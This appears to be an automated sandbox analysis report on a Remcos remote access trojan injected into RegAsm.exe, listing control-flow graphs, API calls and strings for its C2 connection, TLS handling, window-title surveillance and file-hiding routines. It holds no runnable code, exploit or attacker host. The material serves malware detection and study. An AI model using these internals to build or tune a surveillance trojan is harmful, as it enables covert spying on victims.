178->180 181 40edc5-40edcc 178->181 236 40efa6-40effa call 401e65 call 401fab call 402093 call 401fab call 4137aa call 401e65 call 401fab call 43bb2c 180->236 184 40ee4a-40ee54 call 409092 181->184 185 40edce-40ee48 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40ce34 181->185 191 40ee59-40ee7d call 40247c call 434829 184->191 185->191 212 40ee8c 191->212 213 40ee7f-40ee8a call 436f10 191->213 205->178 218 40ee8e-40eed9 call 401f04 call 43f859 call 40247c call 401fab call 40247c call 401fab call 413982 212->218 213->218 273 40eede-40ef03 call 434832 call 401e65 call 40b9f8 218->273 287 40f017-40f019 236->287 288 40effc 236->288 273->236 286 40ef09-40ef28 call 401e65 call 41bcef call 40f4af 273->286 286->236 306 40ef2a 286->306 289 40f01b-40f01d 287->289 290 40f01f 287->290 292 40effe-40f015 call 41ce2c CreateThread 288->292 289->292 294 40f025-40f101 call 402093 * 2 call 41b580 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409e1f call 401e65 call 401fab 290->294 292->294 344 40f103-40f13a call 43455e call 401e65 call 401fab CreateThread 294->344 345 40f13c 294->345 306->94 347 40f13e-40f156 call 401e65 call 401fab 344->347 345->347 357 40f194-40f1a7 call 401e65 call 401fab 347->357 358 40f158-40f18f call 43455e call 401e65 call 401fab CreateThread 347->358 368 40f207-40f21a call 401e65 call 401fab 357->368 369 40f1a9-40f202 call 401e65 call 401fab call 401e65 call 401fab call 40da23 call 401f13 call 401f09 CreateThread 357->369 358->357 379 40f255-40f279 call 41b69e call 401f13 call 401f09 368->379 380 40f21c-40f250 call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 40c19d 368->380 369->368 400 40f27b-40f27c SetProcessDEPPolicy 379->400 401 40f27e-40f291 CreateThread 379->401 380->379 400->401 404 40f293-40f29d CreateThread 401->404 405 40f29f-40f2a6 401->405 404->405 408 40f2b4-40f2bb 405->408 409 40f2a8-40f2b2 CreateThread 405->409 412 40f2c9 408->412 413 40f2bd-40f2c0 408->413 409->408 418 40f2ce-40f302 call 402093 call 4052fd call 402093 call 41b580 call 401fd8 412->418 415 40f2c2-40f2c7 413->415 416 40f307-40f31a call 401fab call 41353a 413->416 415->418 425 40f31f-40f322 416->425 418->416 425->157 427 40f328-40f368 call 41bcef call 401f04 call 413656 call 401f09 call 401f04 425->427 443 40f381-40f386 DeleteFileW 427->443 444 40f388 443->444 445 40f36a-40f36d 443->445 444->126 445->126 446 40f36f-40f37c Sleep call 401f04 445->446 446->443
                                                  APIs
                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040EA29
                                                    • Part of subcall function 00410F72: __EH_prolog.LIBCMT ref: 00410F77
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                  • String ID: SG$ SG$8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                                  • API String ID: 2830904901-3701325316
                                                  • Opcode ID: 2199bd2de398ccf8a1346b2b40a1738b67815dd12efcceaf0f6a0a09c4cb1fc0
                                                  • Instruction ID: f870588dacc207cf398a21a9077505b2b75b96970711a81e27f166ce8512e3fa
                                                  • Opcode Fuzzy Hash: 2199bd2de398ccf8a1346b2b40a1738b67815dd12efcceaf0f6a0a09c4cb1fc0
                                                  • Instruction Fuzzy Hash: 9B32F960B043412BDA24B7729C57B7E26994F80748F50483FB9467B2E3EEBC8D45839E
                                                  Function 00414F65 Relevance: 46.3, APIs: 5, Strings: 21, Instructions: 809sleepnetworkCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 448 414f65-414fad call 4020df call 41b944 call 4020df call 401e65 call 401fab call 43bb2c 461 414fbc-415008 call 402093 call 401e65 call 4020f6 call 41beac call 40489e call 401e65 call 40b9f8 448->461 462 414faf-414fb6 Sleep 448->462 477 41500a-415079 call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 40473d 461->477 478 41507c-415117 call 402093 call 401e65 call 4020f6 call 41beac call 401e65 * 2 call 406c59 call 402f10 call 401fe2 call 401fd8 * 2 call 401e65 call 405b05 461->478 462->461 477->478 531 415127-41512e 478->531 532 415119-415125 478->532 533 415133-4151c5 call 405aa6 call 40531e call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 2 call 401e65 call 401fab call 401e65 call 401fab call 414f24 531->533 532->533 560 415210-41521e call 40482d 533->560 561 4151c7-41520b WSAGetLastError call 41cb72 call 4052fd call 402093 call 41b580 call 401fd8 533->561 567 415220-415246 call 402093 * 2 call 41b580 560->567 568 41524b-415260 call 404f51 call 4048c8 560->568 584 415ade-415af0 call 404e26 call 4021fa 561->584 567->584 583 415266-4153b9 call 401e65 * 2 call 40531e call 406383 call 402f10 call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 4 call 41b871 call 4145f8 call 409097 call 441ed1 call 401e65 call 4020f6 call 40247c call 401fab * 2 call 413733 568->583 568->584 648 4153bb-4153c8 call 405aa6 583->648 649 4153cd-4153f4 call 401fab call 4135e1 583->649 596 415af2-415b12 call 401e65 call 401fab call 43bb2c Sleep 584->596 597 415b18-415b20 call 401e8d 584->597 596->597 597->478 648->649 655 4153f6-4153f8 649->655 656 4153fb-4157ba call 40417e call 40ddc4 call 41bcd3 call 41bdaf call 41bc1f call 401e65 GetTickCount call 41bc1f call 41bb77 call 41bc1f * 2 call 41bb27 call 41bdaf * 5 call 40f90c call 41bdaf call 402f31 call 402ea1 call 402f10 call 402ea1 call 402f10 * 3 call 402ea1 call 402f10 call 406383 call 402f10 call 406383 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 406383 call 402f10 * 5 call 402ea1 call 402f10 call 402ea1 call 402f10 * 7 call 402ea1 649->656 655->656 782 4157bc call 404aa1 656->782 783 4157c1-415a45 call 401fd8 * 50 call 401f09 call 401fd8 * 6 call 401f09 call 404c10 782->783 901 415a4a-415a51 783->901 902 415a53-415a5a 901->902 903 415a65-415a6c 901->903 902->903 904 415a5c-415a5e 902->904 905 415a78-415aaa call 405a6b call 402093 * 2 call 41b580 903->905 906 415a6e-415a73 call 40b08c 903->906 904->903 917 415aac-415ab8 CreateThread 905->917 918 415abe-415ad9 call 401fd8 * 2 call 401f09 905->918 906->905 917->918 918->584
                                                  APIs
                                                  • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414FB6
                                                  • WSAGetLastError.WS2_32(00000000,00000001), ref: 004151C7
                                                  • Sleep.KERNEL32(00000000,00000002), ref: 00415B12
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep$ErrorLastLocalTime
                                                  • String ID: | $%I64u$5.1.1 Pro$8SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$PSG$TLS Off$TLS On $dMG$hlight$name$NG$NG$PG$PG$PG
                                                  • API String ID: 524882891-3007660392
                                                  • Opcode ID: 948cd98a942e852b60b2306ae3dc943f102348f17b1aa1f97d96d3b2a21ead90
                                                  • Instruction ID: 9dea7478a43989413a8a7de35667e348ffff56bc780dedce428272fd6db975fd
                                                  • Opcode Fuzzy Hash: 948cd98a942e852b60b2306ae3dc943f102348f17b1aa1f97d96d3b2a21ead90
                                                  • Instruction Fuzzy Hash: B8526C31A001155ACB18F732DD96AFEB3769F90348F5044BFE40A761E2EF781E858A9D
                                                  Function 00414DC1 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 925 414dc1-414dfd 926 414e03-414e18 GetSystemDirectoryA 925->926 927 414f18-414f23 925->927 928 414f0e 926->928 929 414e1e-414e6a call 441a8e call 441ae8 LoadLibraryA 926->929 928->927 934 414e81-414ebb call 441a8e call 441ae8 LoadLibraryA 929->934 935 414e6c-414e76 GetProcAddress 929->935 946 414f0a-414f0d 934->946 947 414ebd-414ec7 GetProcAddress 934->947 936 414e78-414e7b FreeLibrary 935->936 937 414e7d-414e7f 935->937 936->937 937->934 940 414ed2 937->940 942 414ed4-414ee5 GetProcAddress 940->942 944 414ee7-414eeb 942->944 945 414eef-414ef2 FreeLibrary 942->945 944->942 948 414eed 944->948 949 414ef4-414ef6 945->949 946->928 950 414ec9-414ecc FreeLibrary 947->950 951 414ece-414ed0 947->951 948->949 949->946 952 414ef8-414f08 949->952 950->951 951->940 951->946 952->946 952->952
                                                  APIs
                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                  • LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                  • LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00414EF0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                  • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                  • API String ID: 2490988753-744132762
                                                  • Opcode ID: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                  • Instruction ID: 3d65f6a93fba2a0b2eac8854c7d2b2934d6e6a161d7d6dc9994b6ec54a408268
                                                  • Opcode Fuzzy Hash: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                  • Instruction Fuzzy Hash: 5E31C4B1905315A7D7209F65CC84DDF76DCAB84754F004A2AF944A3210D738D985CBAE
                                                  Function 0040A761 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • Sleep.KERNEL32(00001388), ref: 0040A77B
                                                    • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
                                                    • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                    • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                    • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000), ref: 0040A729
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                                                  • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
                                                  • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040A859
                                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                  • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A962
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                  • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                                  • API String ID: 3795512280-1152054767
                                                  • Opcode ID: fcc29488dd826d1e3e905d90cfd1e685e258c9bd02a7bd2fd8e0a043009058da
                                                  • Instruction ID: 2a79d88b44a8fc0b04dcb000ea34af81e4c48788ca5147296d011aa32960a087
                                                  • Opcode Fuzzy Hash: fcc29488dd826d1e3e905d90cfd1e685e258c9bd02a7bd2fd8e0a043009058da
                                                  • Instruction Fuzzy Hash: B6516E716043015ACB15BB72C866ABE77AA9F80349F00483FF646B71E2DF7C9D09865E
                                                  Function 004048C8 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144networkCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1051 4048c8-4048e8 connect 1052 404a1b-404a1f 1051->1052 1053 4048ee-4048f1 1051->1053 1056 404a21-404a2f WSAGetLastError 1052->1056 1057 404a97 1052->1057 1054 404a17-404a19 1053->1054 1055 4048f7-4048fa 1053->1055 1058 404a99-404a9e 1054->1058 1059 404926-404930 call 420cf1 1055->1059 1060 4048fc-404923 call 40531e call 402093 call 41b580 1055->1060 1056->1057 1061 404a31-404a34 1056->1061 1057->1058 1073 404941-40494e call 420f20 1059->1073 1074 404932-40493c 1059->1074 1060->1059 1063 404a71-404a76 1061->1063 1064 404a36-404a6f call 41cb72 call 4052fd call 402093 call 41b580 call 401fd8 1061->1064 1066 404a7b-404a94 call 402093 * 2 call 41b580 1063->1066 1064->1057 1066->1057 1083 404950-404973 call 402093 * 2 call 41b580 1073->1083 1084 404987-404992 call 421ad1 1073->1084 1074->1066 1113 404976-404982 call 420d31 1083->1113 1096 4049c4-4049d1 call 420e97 1084->1096 1097 404994-4049c2 call 402093 * 2 call 41b580 call 421143 1084->1097 1110 4049d3-4049f6 call 402093 * 2 call 41b580 1096->1110 1111 4049f9-404a14 CreateEventW * 2 1096->1111 1097->1113 1110->1111 1111->1054 1113->1057
                                                  APIs
                                                  • connect.WS2_32(?,?,?), ref: 004048E0
                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                  • WSAGetLastError.WS2_32 ref: 00404A21
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                  • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                  • API String ID: 994465650-2151626615
                                                  • Opcode ID: 45ff517fd2582d6e0a202418ab4ffabcdb2540000aed43e3d88e52077495edcf
                                                  • Instruction ID: 8b7d3ad86a52f8452b0ebae4faff6649d271d562dba2871a89d137605d3bb54b
                                                  • Opcode Fuzzy Hash: 45ff517fd2582d6e0a202418ab4ffabcdb2540000aed43e3d88e52077495edcf
                                                  • Instruction Fuzzy Hash: CE41E8B57506017BC61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF
                                                  Function 0040AD11 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • __Init_thread_footer.LIBCMT ref: 0040AD73
                                                  • Sleep.KERNEL32(000001F4), ref: 0040AD7E
                                                  • GetForegroundWindow.USER32 ref: 0040AD84
                                                  • GetWindowTextLengthW.USER32(00000000), ref: 0040AD8D
                                                  • GetWindowTextW.USER32(00000000,00000000,00000000,00000001,00000000), ref: 0040ADC1
                                                  • Sleep.KERNEL32(000003E8), ref: 0040AE8F
                                                    • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                  • String ID: [${ User has been idle for $ minutes }$]
                                                  • API String ID: 911427763-3954389425
                                                  • Opcode ID: 1d1453891d5a0c3fd18e7847a2101c1b07e014a2f3fd082d5303374a996e40ae
                                                  • Instruction ID: 479ab846abdc3ffa357cf8cfb056c4a9d7a1c57035fbb5610920680a3dc8d5cf
                                                  • Opcode Fuzzy Hash: 1d1453891d5a0c3fd18e7847a2101c1b07e014a2f3fd082d5303374a996e40ae
                                                  • Instruction Fuzzy Hash: 1251E2716043419BD714FB22D856AAE7795AF84308F10093FF986A22E2EF7C9D44C69F
                                                  Function 0040DA6F Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1206 40da6f-40da94 call 401f86 1209 40da9a 1206->1209 1210 40dbbe-40dbe4 call 401f04 GetLongPathNameW call 40417e 1206->1210 1211 40dae0-40dae7 call 41c048 1209->1211 1212 40daa1-40daa6 1209->1212 1213 40db93-40db98 1209->1213 1214 40dad6-40dadb 1209->1214 1215 40dba9 1209->1215 1216 40db9a-40dba7 call 43c11f 1209->1216 1217 40daab-40dab9 call 41b645 call 401f13 1209->1217 1218 40dacc-40dad1 1209->1218 1219 40db8c-40db91 1209->1219 1236 40dbe9-40dc56 call 40417e call 40de0c call 402fa5 * 2 call 401f09 * 5 1210->1236 1231 40dae9-40db39 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1211->1231 1232 40db3b-40db87 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1211->1232 1221 40dbae call 43c11f 1212->1221 1213->1221 1214->1221 1215->1221 1216->1215 1233 40dbb4-40dbb9 call 409092 1216->1233 1239 40dabe 1217->1239 1218->1221 1219->1221 1234 40dbb3 1221->1234 1244 40dac2-40dac7 call 401f09 1231->1244 1232->1239 1233->1210 1234->1233 1239->1244 1244->1210
                                                  APIs
                                                  • GetLongPathNameW.KERNEL32(00000000,?,00000208,00000000,?,00000030), ref: 0040DBD5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LongNamePath
                                                  • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                  • API String ID: 82841172-425784914
                                                  • Opcode ID: b8d894b691b3e00382c27ba12a86ce93fa8d51d86cdbf8ec607a257f19f9a43d
                                                  • Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
                                                  • Opcode Fuzzy Hash: b8d894b691b3e00382c27ba12a86ce93fa8d51d86cdbf8ec607a257f19f9a43d
                                                  • Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B
                                                  Function 0044ACC9 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1305 44acc9-44ace2 1306 44ace4-44acf4 call 4467e6 1305->1306 1307 44acf8-44acfd 1305->1307 1306->1307 1317 44acf6 1306->1317 1309 44acff-44ad07 1307->1309 1310 44ad0a-44ad2e MultiByteToWideChar 1307->1310 1309->1310 1311 44ad34-44ad40 1310->1311 1312 44aec1-44aed4 call 43502b 1310->1312 1314 44ad94 1311->1314 1315 44ad42-44ad53 1311->1315 1321 44ad96-44ad98 1314->1321 1318 44ad55-44ad64 call 457210 1315->1318 1319 44ad72-44ad83 call 4461b8 1315->1319 1317->1307 1324 44aeb6 1318->1324 1331 44ad6a-44ad70 1318->1331 1319->1324 1332 44ad89 1319->1332 1321->1324 1325 44ad9e-44adb1 MultiByteToWideChar 1321->1325 1329 44aeb8-44aebf call 435ecd 1324->1329 1325->1324 1328 44adb7-44adc9 call 448c33 1325->1328 1334 44adce-44add2 1328->1334 1329->1312 1336 44ad8f-44ad92 1331->1336 1332->1336 1334->1324 1337 44add8-44addf 1334->1337 1336->1321 1338 44ade1-44ade6 1337->1338 1339 44ae19-44ae25 1337->1339 1338->1329 1340 44adec-44adee 1338->1340 1341 44ae27-44ae38 1339->1341 1342 44ae71 1339->1342 1340->1324 1343 44adf4-44ae0e call 448c33 1340->1343 1345 44ae53-44ae64 call 4461b8 1341->1345 1346 44ae3a-44ae49 call 457210 1341->1346 1344 44ae73-44ae75 1342->1344 1343->1329 1358 44ae14 1343->1358 1348 44ae77-44ae90 call 448c33 1344->1348 1349 44aeaf-44aeb5 call 435ecd 1344->1349 1345->1349 1357 44ae66 1345->1357 1346->1349 1361 44ae4b-44ae51 1346->1361 1348->1349 1363 44ae92-44ae99 1348->1363 1349->1324 1362 44ae6c-44ae6f 1357->1362 1358->1324 1361->1362 1362->1344 1364 44aed5-44aedb 1363->1364 1365 44ae9b-44ae9c 1363->1365 1366 44ae9d-44aead WideCharToMultiByte 1364->1366 1365->1366 1366->1349 1367 44aedd-44aee4 call 435ecd 1366->1367 1367->1329
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044AD23
                                                  • __alloca_probe_16.LIBCMT ref: 0044AD5B
                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044ADA9
                                                  • __alloca_probe_16.LIBCMT ref: 0044AE40
                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                                                  • __freea.LIBCMT ref: 0044AEB0
                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                  • __freea.LIBCMT ref: 0044AEB9
                                                  • __freea.LIBCMT ref: 0044AEDE
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                  • String ID:
                                                  • API String ID: 3864826663-0
                                                  • Opcode ID: b8cd4310d0de59be5354cf63c717d249675af8b9c8b383ed5ef79fab109b86d3
                                                  • Instruction ID: de232b2c18f644b0009b05ef7aad101f1c584e700cc6948cb3d999d9ae9be8cc
                                                  • Opcode Fuzzy Hash: b8cd4310d0de59be5354cf63c717d249675af8b9c8b383ed5ef79fab109b86d3
                                                  • Instruction Fuzzy Hash: 41514C72A80206AFFB258F64CC41EBF77A9DB44750F25462EFC14D7240EB38DC60869A
                                                  Function 0041C482 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67fileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1388 41c482-41c493 1389 41c495-41c498 1388->1389 1390 41c4ab-41c4b2 1388->1390 1392 41c4a1-41c4a9 1389->1392 1393 41c49a-41c49f 1389->1393 1391 41c4b3-41c4cc CreateFileW 1390->1391 1394 41c4d2-41c4d7 1391->1394 1395 41c4ce-41c4d0 1391->1395 1392->1391 1393->1391 1397 41c4f2-41c503 WriteFile 1394->1397 1398 41c4d9-41c4e7 SetFilePointer 1394->1398 1396 41c510-41c515 1395->1396 1400 41c505 1397->1400 1401 41c507-41c50e CloseHandle 1397->1401 1398->1397 1399 41c4e9-41c4f0 CloseHandle 1398->1399 1399->1395 1400->1401 1401->1396
                                                  APIs
